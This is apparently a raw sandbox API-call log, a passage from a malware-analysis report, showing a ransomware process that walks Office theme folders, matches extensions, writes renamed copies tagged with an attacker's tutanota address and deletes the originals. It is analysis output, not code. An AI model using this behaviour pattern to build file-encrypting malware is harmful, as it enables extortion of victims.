lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.557] lstrlenW (lpString=".ppt") returned 4 [0046.557] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.557] lstrlenW (lpString=".zip") returned 4 [0046.557] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.557] lstrlenW (lpString=".rar") returned 4 [0046.557] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.557] lstrlenW (lpString=".bz2") returned 4 [0046.557] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.557] lstrlenW (lpString=".7z") returned 3 [0046.557] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.557] lstrlenW (lpString=".dbf") returned 4 [0046.557] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.557] lstrlenW (lpString=".1cd") returned 4 [0046.557] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0046.557] lstrlenW (lpString=".jpg") returned 4 [0046.557] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.557] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0046.557] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.558] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1659) returned 1 [0046.558] CloseHandle (hObject=0x20c) returned 1 [0046.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 0x20 [0046.558] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0046.559] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.559] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.559] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0047.192] GetLastError () returned 0x0 [0047.192] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x67b, lpOverlapped=0x0) returned 1 [0047.195] WriteFile (in: hFile=0x1b8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x680, lpOverlapped=0x0) returned 1 [0047.196] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.196] WriteFile (in: hFile=0x1b8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.196] SetEndOfFile (hFile=0x1b8) returned 1 [0047.196] CloseHandle (hObject=0x1b8) returned 1 [0047.196] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.196] SetEndOfFile (hFile=0x20c) returned 1 [0047.197] CloseHandle (hObject=0x20c) returned 1 [0047.197] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.197] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif")) returned 1 [0047.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.197] lstrlenW (lpString=".doc") returned 4 [0047.197] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.197] lstrlenW (lpString=".docx") returned 5 [0047.197] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.197] lstrlenW (lpString=".pdf") returned 4 [0047.197] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.197] lstrlenW (lpString=".xls") returned 4 [0047.198] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.198] lstrlenW (lpString=".xlsx") returned 5 [0047.198] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.198] lstrlenW (lpString=".ppt") returned 4 [0047.198] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.198] lstrlenW (lpString=".zip") returned 4 [0047.198] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.198] lstrlenW (lpString=".rar") returned 4 [0047.198] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.198] lstrlenW (lpString=".bz2") returned 4 [0047.198] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.198] lstrlenW (lpString=".7z") returned 3 [0047.198] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.198] lstrlenW (lpString=".dbf") returned 4 [0047.198] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.198] lstrlenW (lpString=".1cd") returned 4 [0047.198] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.198] lstrlenW (lpString=".jpg") returned 4 [0047.198] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.198] lstrlenW (lpString=".doc") returned 4 [0047.198] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.198] lstrlenW (lpString=".docx") returned 5 [0047.198] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.198] lstrlenW (lpString=".pdf") returned 4 [0047.198] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.198] lstrlenW (lpString=".xls") returned 4 [0047.198] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.198] lstrlenW (lpString=".xlsx") returned 5 [0047.198] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.199] lstrlenW (lpString=".ppt") returned 4 [0047.199] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.199] lstrlenW (lpString=".zip") returned 4 [0047.199] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.199] lstrlenW (lpString=".rar") returned 4 [0047.199] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.199] lstrlenW (lpString=".bz2") returned 4 [0047.199] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.199] lstrlenW (lpString=".7z") returned 3 [0047.199] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.199] lstrlenW (lpString=".dbf") returned 4 [0047.199] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.199] lstrlenW (lpString=".1cd") returned 4 [0047.199] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 74 [0047.199] lstrlenW (lpString=".jpg") returned 4 [0047.199] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.199] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0047.199] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.200] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=37440) returned 1 [0047.200] CloseHandle (hObject=0x20c) returned 1 [0047.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 0x20 [0047.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.201] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.201] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0047.201] GetLastError () returned 0x0 [0047.201] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x9240, lpOverlapped=0x0) returned 1 [0047.203] WriteFile (in: hFile=0x1b8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x9250, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x9250, lpOverlapped=0x0) returned 1 [0047.205] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.205] WriteFile (in: hFile=0x1b8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.205] SetEndOfFile (hFile=0x1b8) returned 1 [0047.205] CloseHandle (hObject=0x1b8) returned 1 [0047.205] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.205] SetEndOfFile (hFile=0x20c) returned 1 [0047.206] CloseHandle (hObject=0x20c) returned 1 [0047.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.206] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png")) returned 1 [0047.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.206] lstrlenW (lpString=".doc") returned 4 [0047.207] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.207] lstrlenW (lpString=".docx") returned 5 [0047.207] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.207] lstrlenW (lpString=".pdf") returned 4 [0047.207] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.207] lstrlenW (lpString=".xls") returned 4 [0047.207] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.207] lstrlenW (lpString=".xlsx") returned 5 [0047.207] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.207] lstrlenW (lpString=".ppt") returned 4 [0047.207] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.207] lstrlenW (lpString=".zip") returned 4 [0047.207] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.207] lstrlenW (lpString=".rar") returned 4 [0047.207] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.207] lstrlenW (lpString=".bz2") returned 4 [0047.207] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.207] lstrlenW (lpString=".7z") returned 3 [0047.207] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.207] lstrlenW (lpString=".dbf") returned 4 [0047.207] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.207] lstrlenW (lpString=".1cd") returned 4 [0047.207] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.207] lstrlenW (lpString=".jpg") returned 4 [0047.207] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.207] lstrlenW (lpString=".doc") returned 4 [0047.207] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.207] lstrlenW (lpString=".docx") returned 5 [0047.207] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.208] lstrlenW (lpString=".pdf") returned 4 [0047.208] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.208] lstrlenW (lpString=".xls") returned 4 [0047.208] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.208] lstrlenW (lpString=".xlsx") returned 5 [0047.208] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.208] lstrlenW (lpString=".ppt") returned 4 [0047.208] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.208] lstrlenW (lpString=".zip") returned 4 [0047.208] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.208] lstrlenW (lpString=".rar") returned 4 [0047.208] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.208] lstrlenW (lpString=".bz2") returned 4 [0047.208] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.208] lstrlenW (lpString=".7z") returned 3 [0047.208] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.208] lstrlenW (lpString=".dbf") returned 4 [0047.208] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.208] lstrlenW (lpString=".1cd") returned 4 [0047.208] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76 [0047.208] lstrlenW (lpString=".jpg") returned 4 [0047.208] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.208] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0047.208] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.209] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1593) returned 1 [0047.209] CloseHandle (hObject=0x20c) returned 1 [0047.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 0x20 [0047.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.209] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.209] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0047.211] GetLastError () returned 0x0 [0047.211] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x639, lpOverlapped=0x0) returned 1 [0047.213] WriteFile (in: hFile=0x1b8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x640, lpOverlapped=0x0) returned 1 [0047.214] ReadFile (in: hFile=0x20c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.214] WriteFile (in: hFile=0x1b8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.214] SetEndOfFile (hFile=0x1b8) returned 1 [0047.214] CloseHandle (hObject=0x1b8) returned 1 [0047.214] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.214] SetEndOfFile (hFile=0x20c) returned 1 [0047.215] CloseHandle (hObject=0x20c) returned 1 [0047.215] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.215] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif")) returned 1 [0047.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.215] lstrlenW (lpString=".doc") returned 4 [0047.215] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.215] lstrlenW (lpString=".docx") returned 5 [0047.215] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.215] lstrlenW (lpString=".pdf") returned 4 [0047.215] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.215] lstrlenW (lpString=".xls") returned 4 [0047.215] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.216] lstrlenW (lpString=".xlsx") returned 5 [0047.216] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.216] lstrlenW (lpString=".ppt") returned 4 [0047.216] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.216] lstrlenW (lpString=".zip") returned 4 [0047.216] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.216] lstrlenW (lpString=".rar") returned 4 [0047.216] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.216] lstrlenW (lpString=".bz2") returned 4 [0047.216] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.216] lstrlenW (lpString=".7z") returned 3 [0047.216] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.216] lstrlenW (lpString=".dbf") returned 4 [0047.216] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.216] lstrlenW (lpString=".1cd") returned 4 [0047.216] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.216] lstrlenW (lpString=".jpg") returned 4 [0047.216] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 73 [0047.216] lstrlenW (lpString=".doc") returned 4 [0047.216] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.216] lstrlenW (lpString=".docx") returned 5 [0047.216] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.216] lstrlenW (lpString=".pdf") returned 4 [0047.216] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.216] lstrlenW (lpString=".xls") returned 4 [0047.216] 